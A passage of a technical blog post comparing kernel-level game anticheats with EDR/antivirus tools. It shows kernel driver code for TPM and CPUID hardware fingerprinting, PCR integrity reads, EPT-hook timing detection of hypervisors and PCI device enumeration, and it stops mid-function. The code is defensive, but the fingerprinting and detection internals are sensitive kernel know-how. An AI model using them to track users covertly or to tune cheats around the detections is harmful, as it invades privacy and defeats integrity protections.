<p>In this blogpost we're going to see a few things, mainly comparing Kernel-Level Anticheats to EDR/AV solutions (which is a comparison many anticheat firms make), what type of telemetry they monitor, what type of protection methods they have, and what are the alternative solutions to kernel mode anticheats.</p>
<p>This article would not be possible without :</p>
<ul>
<li><p>ItsGamerDoc reflection on <a target="_blank" href="https://x.com/ItsGamerDoc/status/1796233961720422533">anticheats and their public perception</a></p>
</li>
<li><p>Amazing research from the following individuals</p>
<ul>
<li><p>Writeup about <a target="_blank" href="https://reversing.info/posts/guardedregions/">Valorant's Guarded Memory Regions</a> by <a target="_blank" href="https://x.com/Xyrem256">@xyrem256</a></p>
</li>
<li><p>Writeup about <a target="_blank" href="https://invlpg.dev/post/ace_screenshots/">Anti Cheat Extreme (ACE)'s Screenshotting Capabilities</a> by <a target="_blank" href="https://x.com/koyzdev">@koyzdev</a></p>
</li>
</ul>
</li>
<li><p><a target="_blank" href="https://github.com/donnaskiez/ac">ac open source anticheat</a> project on GitHub by <a target="_blank" href="https://github.com/donnaskiez"><strong>donnaskiez</strong></a></p>
</li>
<li><p>Alot of writeups about Vanguard implementations on Valorant and <a target="_blank" href="https://www.leagueoflegends.com/en-us/news/dev/dev-vanguard-x-lol/">League of Legends</a> by Riot Games</p>
</li>
<li><p><a target="_blank" href="https://www.unknowncheats.me/forum/index.php">The UnknownCheats forum</a>, lmfao</p>
</li>
</ul>
<h1 id="heading-comparing-edrs-to-anticheats">Comparing EDRs to Anticheats</h1>
<p>To be honest this entire article was made due to a post by an article by ItsGamerDoc on X (formerly Twitter) about anticheats and their public perception in the gaming community. He works as a Senior Anticheat Analyst at Riot Games and i've been following his work for sometime, and this article of mine is in no way an attack on him or his employers.</p>
<p>The article details how the concern for kernel level anticheats are overblown, and how it does similar things as like an anvirus (which i more commonly refer to as Endpoint Detection and Response (EDR), an enterprise and more agg version of antiviruses). At first, the comparison between EDR and anticheat systems make sense. They're both programs to detect malicious activity against certain processes in the system, and to achieve this they both do seemingly similar things :</p>
<ul>
<li><p>Signature-based detection of known threats (usually anticheats will halt the execution of software like IDA Pro or x64dbg)</p>
</li>
<li><p>Detection and prevention of mapped drivers and DLLs (similar to the prevention of LOLBins)</p>
</li>
<li><p>Monitoring certain system binaries and processes through behavioral detection to spot malicious activity</p>
</li>
<li><p>Obfuscation of certain processes to make sure tampering is harder</p>
</li>
</ul>
<p>But there is a very fundamental difference between EDRs and anticheats that many vendors like to skip over, the adversarial nature of the relationship between the user and the software. In EDR/AVs, the users are working with the security vendor to prevent a security breach and the attackers are usually external actors, but in anticheat software the user is the attacker.</p>
<p>To effectively monitor and intervene in the activities of potential cheaters, anticheats often operate at the kernel level. This allows them to intercept system calls, monitor kernel objects, and prevent tampering with user-mode processes. Kernel-level drivers can provide a higher privilege level, enabling more robust protection mechanisms such as NMI (Non-Maskable Interrupt) stack walking and direct hardware access for integrity checks.</p>
<p>Continuous verification of the integrity of the game's executable and memory space is critical. Anticheats employ techniques such as cyclic redundancy checks (CRC), hash-based verifications, and periodic integrity checks on both static and dynamic code sections. This ensures that any unauthorized modifications or injections are detected and thwarted promptly.</p>
<p>Similar to EDRs, anticheat systems also rely on behavioral analysis but with a more aggressive stance. This includes monitoring for patterns indicative of cheating, such as abnormal input rates, suspicious memory modifications, and unauthorized API calls. But this has also extended into more, aggressive and spyware like behavior.</p>
<p>Unlike EDR systems that may prioritize logging and post-event analysis, anticheat solutions require real-time intervention capabilities. This means detecting and responding to cheating attempts as they occur, often resulting in the immediate suspension or banning of the offending player. Techniques such as immediate process termination, user session invalidation, and real-time communication with game servers for coordinated responses are employed.</p>
<p>Fundamentally, the adversarial relationship between the user and anticheat systems changes the entire dynamic of how the software operates and what measures it employs. In the case of EDR systems, the security model is built on trust. The assumption is that the endpoint user is cooperating with the security measures, and the focus is on detecting, analyzing, and responding to threats that typically come from external sources. In contrast, anticheat systems operate in an inherently hostile environment. The anticheat software must assume that the user (or a subset of users) will actively attempt to circumvent its measures.</p>
<p>This article is meant as introducing people to the concept of kernel-level anticheats, how it works, and what does it do. While i talk alot about the anticheats like MiHoYo Protect (mhyprot.sys) and Riot Games Vanguard (vgk.sys), the discussion here about the telemetry and protection methods are more of a combination of alot of different methods i've found tinkering with different anticheat programs, public documentation, and also code from the <a target="_blank" href="https://github.com/donnaskiez/ac">ac open source anticheat</a> by <a target="_blank" href="https://github.com/donnaskiez"><strong>donnaskiez</strong></a> under the <a target="_blank" href="https://choosealicense.com/licenses/agpl-3.0/">AGPL-3.0</a>.</p>
<h1 id="heading-environment-verification-and-fingerprinting">Environment Verification and Fingerprinting</h1>
<p>Anticheats must be able to validate the environment they are running on to make sure that they are running inside of a trusted environment. This is not only to do things such as enforcing game bans, but also to detect if they are being run in a virtual machine, debugger, or sandbox, which are common tools used by cheat developers to analyze and bypass anti-cheat protections.</p>
<p>This includes the fingerprinting of the hardware that they are running on, detecting malicious PCI devices, and also detecting virtualized environments. The latter reason is why games like Valorant are unable to be run through translation layers like Crossover (Mac) or Wine (Linux).</p>
<h2 id="heading-hardware-fingerprinting-through-tpm">Hardware Fingerprinting Through TPM</h2>
<p>Extraction of hardware identifiers involves identifying and collecting unique information from the hardware components of a computer system to ensure the integrity and authenticity of the system running the software. This is crucial for anti-cheat mechanisms as it helps in uniquely identifying a machine, preventing users from easily evading bans or other restrictions by simply reinstalling the software or changing user accounts.</p>
<p>To extract hardware identifiers, the kernel-level driver interacts directly with the hardware or low-level system APIs. For instance, the driver might query the system's BIOS, CPU, motherboard, network interfaces, and other components to gather unique identifiers such as serial numbers or MAC addresses.</p>
<p>One common approach is to use the CPUID instruction to obtain the CPU's serial number and other characteristics. This can be achieved using inline assembly in C:</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">get_cpu_id</span><span class="hljs-params">(<span class="hljs-keyword">char</span>* cpu_id)</span> </span>{
    <span class="hljs-keyword">int</span> cpu_info[<span class="hljs-number">4</span>] = { <span class="hljs-number">0</span> };
    __cpuid(cpu_info, <span class="hljs-number">0</span>);
    <span class="hljs-built_in">sprintf</span>(cpu_id, <span class="hljs-string">"%08X%08X%08X%08X"</span>, cpu_info[<span class="hljs-number">0</span>], cpu_info[<span class="hljs-number">1</span>], cpu_info[<span class="hljs-number">2</span>], cpu_info[<span class="hljs-number">3</span>]);
}
</code></pre>
<p>In the code, the <code>__cpuid</code> intrinsic is used to execute the CPUID instruction, which fills the <code>cpu_info</code> array with the CPU's identification information. This information is then formatted into a string that represents the CPU's unique ID.</p>
<p>But there are more aggressive anticheats like Riot Games' Vanguard Anticheat, which requires TPM (Trusted Platform Module) to extract unique hardware-related information. TPM is used by apps to securely create and store cryptographic keys, and to confirm that the operating system and firmware on your device are what they're supposed to be, and haven't been tampered with.</p>
<p>Anti-cheat systems use hardware identifiers to ensure that the machine's hardware and firmware have not been tampered with. By regularly verifying these identifiers against known values, the system can detect if any unauthorized hardware changes have been made, which might indicate an attempt to compromise the game's security.</p>
<p>Some cheats also operate by modifying hardware-level interactions, such as manipulating memory or utilizing custom drivers to alter game behavior. By monitoring hardware identifiers, the anti-cheat system can detect unusual changes or unauthorized access at the hardware level, which is often a strong indicator of cheating.</p>
<p>We first need to ensure the current platform can support TPM operations by checking the CPU type. If the TPM hardware is present, we can go ahead and determine the type of TPM interface. We can read the TPM CRB (Command Response Buffer) interface identifier and FIFO interface capability from physical memory to identify the specific type of TPM interface.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC NTSTATUS <span class="hljs-title">TpmGetPtpInterfaceType</span><span class="hljs-params">(_In_ PVOID Register, _Out_ TPM2_PTP_INTERFACE_TYPE* InterfaceType)</span> </span>{
    NTSTATUS                      status     = STATUS_UNSUCCESSFUL;
    PTP_CRB_INTERFACE_IDENTIFIER  identifier = {<span class="hljs-number">0</span>};
    PTP_FIFO_INTERFACE_CAPABILITY capability = {<span class="hljs-number">0</span>};

    *InterfaceType = <span class="hljs-number">0</span>;

    status = MapAndReadPhysical(
        (UINT64)(&amp;((PTP_CRB_REGISTERS*)Register)-&gt;InterfaceId),
        <span class="hljs-keyword">sizeof</span>(PTP_CRB_INTERFACE_IDENTIFIER),
        &amp;identifier,
        <span class="hljs-keyword">sizeof</span>(PTP_CRB_INTERFACE_IDENTIFIER));

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"MapAndReadPhysical: %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    status = MapAndReadPhysical(
        (UINT64) &amp; ((PTP_FIFO_REGISTERS*)Register)-&gt;InterfaceCapability,
        <span class="hljs-keyword">sizeof</span>(PTP_FIFO_INTERFACE_CAPABILITY),
        &amp;capability,
        <span class="hljs-keyword">sizeof</span>(PTP_FIFO_INTERFACE_CAPABILITY));

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"MapAndReadPhysical: %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    *InterfaceType = TpmExtractInterfaceTypeFromCapabilityAndId(&amp;identifier, &amp;capability);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>We can then determines the TPM interface type and retrieves the TPM endorsement key, which serves as a unique hardware identifier.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">TpmExtractEndorsementKey</span><span class="hljs-params">()</span> </span>{
    NTSTATUS                status   = STATUS_UNSUCCESSFUL;
    BOOLEAN                 presence = FALSE;
    TPM2_PTP_INTERFACE_TYPE type     = {<span class="hljs-number">0</span>};

    <span class="hljs-keyword">if</span> (!TpmIsPlatformSupported())
        <span class="hljs-keyword">return</span> STATUS_NOT_SUPPORTED;

    status = TpmCheckPtpRegisterPresence(TPM20_INTEL_BASE_PHYSICAL, &amp;presence);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"TpmCheckPtpRegisterPresence: %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">if</span> (!presence) {
        DEBUG_INFO(<span class="hljs-string">"TPM2.0 PTP Presence not detected."</span>);
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }

    status = TpmGetPtpInterfaceType(TPM20_INTEL_BASE_PHYSICAL, &amp;type);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"TpmGetPtpInterfaceType: %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    DEBUG_INFO(<span class="hljs-string">"TPM2.0 PTP Interface Type: %x"</span>, (UINT32)type);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Once the TPM endorsement key is retrieved, the anti-cheat system can use this key to create a unique profile for the device, ensuring that each device can be reliably tracked. This helps in identifying and tracking users across different gaming sessions, even if they change their network identities or reinstall the game.</p>
<p>The endorsement key can be used as part of a larger integrity check process. By combining the endorsement key with other hardware and software identifiers, the anti-cheat system can create a comprehensive profile of the system. This profile can be checked against known good states to detect any unauthorized changes or tampering, ensuring that the system has not been compromised.</p>
<p>We can do this by reading the Platform Configuration Register (PCR) value from the TPM (Trusted Platform Module) to detect if the device has been tampered with. This involves several steps: ensuring buffer size, initializing a TBS (TPM Base Services) context, preparing and sending a TPM command, checking the TPM response, extracting the PCR value, and cleaning up resources.</p>
<p>The function starts by ensuring that the provided buffer is large enough to hold the PCR value, which is typically 32 bytes for SHA-256 hashed values.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">ReadPcrValue</span><span class="hljs-params">(UINT32 pcrIndex, BYTE* pcrValue, UINT32 pcrValueSize)</span> </span>{
    <span class="hljs-keyword">if</span> (pcrValueSize &lt; PCR_VALUE_SIZE) {
        <span class="hljs-keyword">return</span> STATUS_BUFFER_TOO_SMALL;
    }
</code></pre>
<p>Next, a TBS context is initialized. The TBS context facilitates communication with the TPM hardware. The <code>TBS_CONTEXT_PARAMS2</code> structure is configured to specify the use of TPM 2.0, as detailed in <a target="_blank" href="https://learn.microsoft.com/en-us/windows/security/hardware-security/tpm/switch-pcr-banks-on-tpm-2-0-devices">a Microsoft documentation</a> about the issue.</p>
<pre><code class="lang-c">   TBS_HCONTEXT hContext = <span class="hljs-literal">NULL</span>;
    TBS_RESULT result;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    <span class="hljs-comment">// Initialize the TBS context</span>
    TBS_CONTEXT_PARAMS2 contextParams;
    contextParams.version = TBS_CONTEXT_VERSION_TWO;
    contextParams.asUINT32 = <span class="hljs-number">0</span>;
    contextParams.includeTpm12 = <span class="hljs-number">0</span>;
    contextParams.includeTpm20 = <span class="hljs-number">1</span>;

    result = Tbsi_Context_Create((PCTBS_CONTEXT_PARAMS)&amp;contextParams, &amp;hContext);
    <span class="hljs-keyword">if</span> (result != TBS_SUCCESS) {
        DEBUG_ERROR(<span class="hljs-string">"Tbsi_Context_Create failed with result: %x"</span>, result);
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }
</code></pre>
<p>The function then prepares the TPM command buffer. This buffer holds the TPM command to read the PCR value. The command is structured according to the TPM 2.0 specification, beginning with a command header containing the command code for <code>TPM2_PCR_Read</code>.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Prepare TPM command buffer</span>
    BYTE commandBuffer[<span class="hljs-number">1024</span>] = { <span class="hljs-number">0</span> };
    UINT32 commandSize = <span class="hljs-keyword">sizeof</span>(commandBuffer);
    BYTE responseBuffer[<span class="hljs-number">1024</span>] = { <span class="hljs-number">0</span> };
    UINT32 responseSize = <span class="hljs-keyword">sizeof</span>(responseBuffer);

    <span class="hljs-comment">// TPM2_PCR_Read command</span>
    TPM2_COMMAND_HEADER* commandHeader = (TPM2_COMMAND_HEADER*)commandBuffer;
    commandHeader-&gt;tag = htons(TPM_ST_NO_SESSIONS);
    commandHeader-&gt;commandCode = htonl(TPM_CC_PCR_Read);
    commandHeader-&gt;commandSize = htonl(<span class="hljs-number">22</span>);

    TPM2_PCR_SELECTION* pcrSelection = (TPM2_PCR_SELECTION*)(commandBuffer + <span class="hljs-keyword">sizeof</span>(TPM2_COMMAND_HEADER));
    pcrSelection-&gt;hash = htons(TPM_ALG_SHA256);
    pcrSelection-&gt;sizeOfSelect = <span class="hljs-number">3</span>;
    <span class="hljs-built_in">memset</span>(pcrSelection-&gt;pcrSelect, <span class="hljs-number">0</span>, <span class="hljs-number">3</span>);
    pcrSelection-&gt;pcrSelect[pcrIndex / <span class="hljs-number">8</span>] = (<span class="hljs-number">1</span> &lt;&lt; (pcrIndex % <span class="hljs-number">8</span>));
</code></pre>
<p>The command is then sent to the TPM using the <code>Tbsip_Submit_Command</code> function. This function handles the low-level communication with the TPM, sending the command buffer and receiving the response buffer.</p>
<pre><code class="lang-c">    <span class="hljs-comment">// Send the TPM command</span>
    result = Tbsip_Submit_Command(hContext, TBS_COMMAND_LOCALITY_ZERO, TBS_COMMAND_PRIORITY_NORMAL, commandBuffer, commandSize, responseBuffer, &amp;responseSize);
    <span class="hljs-keyword">if</span> (result != TBS_SUCCESS) {
        DEBUG_ERROR(<span class="hljs-string">"Tbsip_Submit_Command failed with result: %x"</span>, result);
        Tbsip_Context_Close(hContext);
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }
</code></pre>
<p>Upon receiving the response, the function checks the TPM response header to ensure that the command was processed successfully. The response header contains the status of the TPM command.</p>
<pre><code class="lang-c">    <span class="hljs-comment">// Check the TPM response</span>
    TPM2_RESPONSE_HEADER* responseHeader = (TPM2_RESPONSE_HEADER*)responseBuffer;
    <span class="hljs-keyword">if</span> (ntohs(responseHeader-&gt;tag) != TPM_ST_NO_SESSIONS || ntohl(responseHeader-&gt;responseCode) != TPM_RC_SUCCESS) {
        DEBUG_ERROR(<span class="hljs-string">"TPM command failed with response code: %x"</span>, ntohl(responseHeader-&gt;responseCode));
        Tbsip_Context_Close(hContext);
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }
</code></pre>
<p>If the TPM command was successful, the function extracts the PCR value from the response buffer. The PCR values are located after the standard response header and other response data. The function copies the PCR value into the provided buffer.</p>
<pre><code class="lang-c">    <span class="hljs-comment">// Extract the PCR value</span>
    BYTE* pcrValues = responseBuffer + <span class="hljs-keyword">sizeof</span>(TPM2_RESPONSE_HEADER) + <span class="hljs-number">10</span>; <span class="hljs-comment">// Skipping the rest of the PCR read response structure</span>
    <span class="hljs-built_in">memcpy</span>(pcrValue, pcrValues, PCR_VALUE_SIZE);
</code></pre>
<p>With this, the anticheat can detect any unauthorized changes to the system's firmware, bootloader, or other critical components, thereby ensuring the integrity of the device.</p>
<h2 id="heading-ept-hook-detection-for-hypervisor-fingerprinting">EPT Hook Detection for Hypervisor Fingerprinting</h2>
<p>EPT (Extended Page Tables) hook detection is a technique used to identify hidden hypervisors or virtualization-based rootkits that manipulate memory access through EPT. This feature, part of Intel VT-x technology, allows a hypervisor to control guest physical address translation, enabling efficient virtualization but also providing a potential vector for malicious activity.</p>
<p>EPT hooks can monitor and modify memory accesses stealthily, making traditional anti-cheat mechanisms ineffective. To counter this, EPT hook detection involves measuring read latencies to identify anomalies indicative of EPT manipulation.</p>
<p>First, we can retrieve and store the addresses of both control functions and protected functions. Control functions serve as a baseline for normal read times, while protected functions are commonly targeted by EPT hooks.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">InitiateEptFunctionAddressArrays</span><span class="hljs-params">()</span>
</span>{
    PAGED_CODE();

    UNICODE_STRING current_function;

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; EPT_CONTROL_FUNCTIONS_COUNT; index++) {
        ImpRtlInitUnicodeString(&amp;current_function, CONTROL_FUNCTIONS[index]);
        CONTROL_FUNCTION_ADDRESSES[index] =
            ImpMmGetSystemRoutineAddress(&amp;current_function);

        <span class="hljs-keyword">if</span> (!CONTROL_FUNCTION_ADDRESSES[index])
            <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; EPT_PROTECTED_FUNCTIONS_COUNT; index++) {
        ImpRtlInitUnicodeString(&amp;current_function, PROTECTED_FUNCTIONS[index]);
        PROTECTED_FUNCTION_ADDRESSES[index] =
            ImpMmGetSystemRoutineAddress(&amp;current_function);

        <span class="hljs-keyword">if</span> (!PROTECTED_FUNCTION_ADDRESSES[index])
            <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }

    <span class="hljs-keyword">return</span> STATUS_SUCCESS;
}
</code></pre>
<p>The average read times of control functions are measured to establish a baseline. This is done by reading the function addresses multiple times and calculating the average time taken for these reads.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
UINT64
<span class="hljs-title">MeasureReads</span><span class="hljs-params">(_In_ PVOID Address, _In_ ULONG Count)</span>
</span>{
    UINT64 read_average = <span class="hljs-number">0</span>;
    KIRQL  irql         = {<span class="hljs-number">0</span>};

    MeasureInstructionRead(Address);

    KeRaiseIrql(HIGH_LEVEL, &amp;irql);
    _disable();

    <span class="hljs-keyword">for</span> (ULONG iteration = <span class="hljs-number">0</span>; iteration &lt; Count; iteration++)
        read_average += MeasureInstructionRead(Address);

    _enable();
    KeLowerIrql(irql);

    <span class="hljs-keyword">return</span> read_average / Count;
}

<span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">GetAverageReadTimeAtRoutine</span><span class="hljs-params">(_In_ PVOID    RoutineAddress,
                            _Out_ PUINT64 AverageTime)</span>
</span>{
    <span class="hljs-keyword">if</span> (!RoutineAddress || !AverageTime)
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;

    <span class="hljs-keyword">if</span> (!MmIsAddressValid(RoutineAddress))
        <span class="hljs-keyword">return</span> STATUS_INVALID_ADDRESS;

    *AverageTime = MeasureReads(RoutineAddress, EPT_CHECK_NUM_ITERATIONS);

    <span class="hljs-keyword">return</span> *AverageTime == <span class="hljs-number">0</span> ? STATUS_UNSUCCESSFUL : STATUS_SUCCESS;
}
</code></pre>
<p>The read times of protected functions are measured in the same way as control functions. These times are then compared to the baseline read times of the control functions.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">DetectEptHooksInKeyFunctions</span><span class="hljs-params">()</span>
</span>{
    PAGED_CODE();

    NTSTATUS status           = STATUS_UNSUCCESSFUL;
    UINT32   control_fails    = <span class="hljs-number">0</span>;
    UINT64   instruction_time = <span class="hljs-number">0</span>;
    UINT64   control_time_sum = <span class="hljs-number">0</span>;
    UINT64   control_average  = <span class="hljs-number">0</span>;

    status = InitiateEptFunctionAddressArrays();

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; EPT_CONTROL_FUNCTIONS_COUNT; index++) {
        status = GetAverageReadTimeAtRoutine(CONTROL_FUNCTION_ADDRESSES[index],
                                             &amp;instruction_time);

        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
            control_fails += <span class="hljs-number">1</span>;
            <span class="hljs-keyword">continue</span>;
        }

        control_time_sum += instruction_time;
    }

    <span class="hljs-keyword">if</span> (control_time_sum == <span class="hljs-number">0</span>)
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;

    control_average =
        control_time_sum / (EPT_CONTROL_FUNCTIONS_COUNT - control_fails);

    <span class="hljs-keyword">if</span> (control_average == <span class="hljs-number">0</span>)
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; EPT_PROTECTED_FUNCTIONS_COUNT; index++) {
        status = GetAverageReadTimeAtRoutine(
            PROTECTED_FUNCTION_ADDRESSES[index], &amp;instruction_time);

        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
            <span class="hljs-keyword">continue</span>;
        }

        <span class="hljs-keyword">if</span> (control_average * EPT_EXECUTION_TIME_MULTIPLIER &lt;
            instruction_time) {
            DEBUG_WARNING(
                <span class="hljs-string">"EPT hook detected at function: %llx with execution time of: %llx"</span>,
                PROTECTED_FUNCTION_ADDRESSES[index],
                instruction_time);
        }
    }

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>If the read time for a protected function significantly exceeds the baseline, it indicates that an EPT hook is present, which is a strong indicator of a hypervisor.</p>
<pre><code class="lang-c"><span class="hljs-keyword">if</span> (control_average * EPT_EXECUTION_TIME_MULTIPLIER &lt; instruction_time) {
    DEBUG_WARNING(
        <span class="hljs-string">"EPT hook detected at function: %llx with execution time of: %llx"</span>,
        PROTECTED_FUNCTION_ADDRESSES[index],
        instruction_time);
}
</code></pre>
<p>By measuring and comparing the read times, the detection mechanism can identify the additional latency introduced by EPT hooks. Since EPT hooks are typically used by hypervisors, detecting these hooks can effectively indicate the presence of a hypervisor.</p>
<h2 id="heading-malicious-pci-device-detection">Malicious PCI Device Detection</h2>
<p>Detecting malicious PCI devices is crucial in the context of kernel-level anti-cheats for several reasons. PCI devices operate at a low level within the computer's architecture, providing direct access to the system's memory and hardware, which allows malicious devices to execute arbitrary code and manipulate system operations in ways that are difficult to detect and counteract from higher levels of the operating system. A malicious PCI device can intercept, alter, or inject <a target="_blank" href="https://astralvx.com/dma-explained/">malicious code directly into the system memory</a>.</p>
<p>Anticheat systems usually perform malicious PCI device detection by scanning the configuration space of PCI devices. Every PCI device has a set of registers commonly referred to as the PCI configuration space. In modern PCI-e devices, an extended configuration space is implemented, which is mapped into the main memory, allowing the system to read/write to the registers. The configuration space consists of a standard header containing information such as the DeviceID, VendorID, Status, and other details.</p>
<p>This configuration space allows querying important information from PCI devices within the device tree using the <code>IRP_MN_READ_CONFIG</code> code, which reads from a PCI device's configuration space.</p>
<p>We can first start by enumerating all PCI device objects in the system.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">ValidatePciDevices</span><span class="hljs-params">()</span>
</span>{
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    status = EnumeratePciDeviceObjects(PciDeviceQueryCallback, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
        DEBUG_ERROR(<span class="hljs-string">"EnumeratePciDeviceObjects failed with status %x"</span>, status);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Windows splits DEVICE_OBJECTS into two categories: Physical Device Object (PDO) and Functional Device Object (FDO). A PDO represents each device connected to a physical bus, with an associated DEVICE_NODE, while an FDO represents the functionality of the device, defining how the system interacts with the device objects. A device stack can have multiple PDOs but only one FDO. To access each PCI device on the system, the anti-cheat system can enumerate all device objects given the PCI FDO, which is managed by <code>pci.sys</code>.</p>
<p>We first retrieve the driver object associated with the PCI driver (<code>pci.sys</code>). It then enumerates all device objects managed by this driver, storing them in an array. For each device object, it checks if the object is a valid Physical Device Object (PDO) by calling the <code>IsDeviceObjectValidPdo</code> function. If it is a valid PDO, the callback routine (<code>PciDeviceQueryCallback</code>) is invoked.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">EnumeratePciDeviceObjects</span><span class="hljs-params">(_In_ PCI_DEVICE_CALLBACK CallbackRoutine,
                          _In_opt_ PVOID           Context)</span>
</span>{
    NTSTATUS        status             = STATUS_UNSUCCESSFUL;
    UNICODE_STRING  pci                = RTL_CONSTANT_STRING(<span class="hljs-string">L"\\Driver\\pci"</span>);
    PDRIVER_OBJECT  pci_driver_object  = <span class="hljs-literal">NULL</span>;
    PDEVICE_OBJECT* pci_device_objects = <span class="hljs-literal">NULL</span>;
    PDEVICE_OBJECT  current_device     = <span class="hljs-literal">NULL</span>;
    UINT32          pci_device_objects_count = <span class="hljs-number">0</span>;

    status = GetDriverObjectByDriverName(&amp;pci, &amp;pci_driver_object);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"GetDriverObjectByDriverName failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    status = EnumerateDriverObjectDeviceObjects(
        pci_driver_object, &amp;pci_device_objects, &amp;pci_device_objects_count);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"EnumerateDriverObjectDeviceObjects failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; pci_device_objects_count; index++) {
        current_device = pci_device_objects[index];

        <span class="hljs-comment">/* make sure we have a valid PDO */</span>
        <span class="hljs-keyword">if</span> (!IsDeviceObjectValidPdo(current_device)) {
            ObDereferenceObject(current_device);
            <span class="hljs-keyword">continue</span>;
        }

        status = CallbackRoutine(current_device, Context);

        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
            DEBUG_ERROR(
                <span class="hljs-string">"EnumeratePciDeviceObjects CallbackRoutine failed with status %x"</span>,
                status);

        ObDereferenceObject(current_device);
    }

    <span class="hljs-keyword">if</span> (pci_device_objects)
        ExFreePoolWithTag(pci_device_objects, POOL_TAG_HW);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Then we read the device's configuration space, starting from the <code>PCI_VENDOR_ID_OFFSET</code>, and stores this data in a <code>PCI_COMMON_HEADER</code> structure. The configuration space consists of a standard header containing information such as the DeviceID, VendorID, Status, and other details. The function reads this space using an IRP with the <code>IRP_MN_READ_CONFIG</code> code.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">PciDeviceQueryCallback</span><span class="hljs-params">(_In_ PDEVICE_OBJECT DeviceObject, _In_opt_ PVOID Context)</span>
</span>{
    UNREFERENCED_PARAMETER(Context);

    NTSTATUS          status = STATUS_UNSUCCESSFUL;
    PCI_COMMON_HEADER header = {<span class="hljs-number">0</span>};

    status = QueryPciDeviceConfigurationSpace(
        DeviceObject, PCI_VENDOR_ID_OFFSET, &amp;header, <span class="hljs-keyword">sizeof</span>(PCI_COMMON_HEADER));

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"QueryPciDeviceConfigurationSpace failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">if</span> (IsPciConfigurationSpaceFlagged(&amp;header)) {
        DEBUG_VERBOSE(<span class="hljs-string">"Flagged DeviceID found. Device: %llx, DeviceId: %lx"</span>,
                      (UINT64)DeviceObject,
                      header.DeviceID);
        ReportBlacklistedPcieDevice(DeviceObject, &amp;header);
    }
    <span class="hljs-keyword">else</span> {
        DEBUG_VERBOSE(<span class="hljs-string">"Device: %llx, DeviceID: %lx, VendorID: %lx"</span>,
                      DeviceObject,
                      header.DeviceID,
                      header.VendorID);
    }

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Then we can send an IRP (I/O Request Packet) to read the configuration space of the PCI device. We then wait for the IRP to complete and then returns the status of the operation. The configuration space contains important registers such as the DeviceID, VendorID, Status, Command, and others, which are crucial for identifying the device.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">QueryPciDeviceConfigurationSpace</span><span class="hljs-params">(_In_ PDEVICE_OBJECT DeviceObject,
                                 _In_ UINT32         Offset,
                                 _Out_opt_ PVOID     Buffer,
                                 _In_ UINT32         BufferLength)</span>
</span>{
    NTSTATUS           status = STATUS_UNSUCCESSFUL;
    KEVENT             event  = {<span class="hljs-number">0</span>};
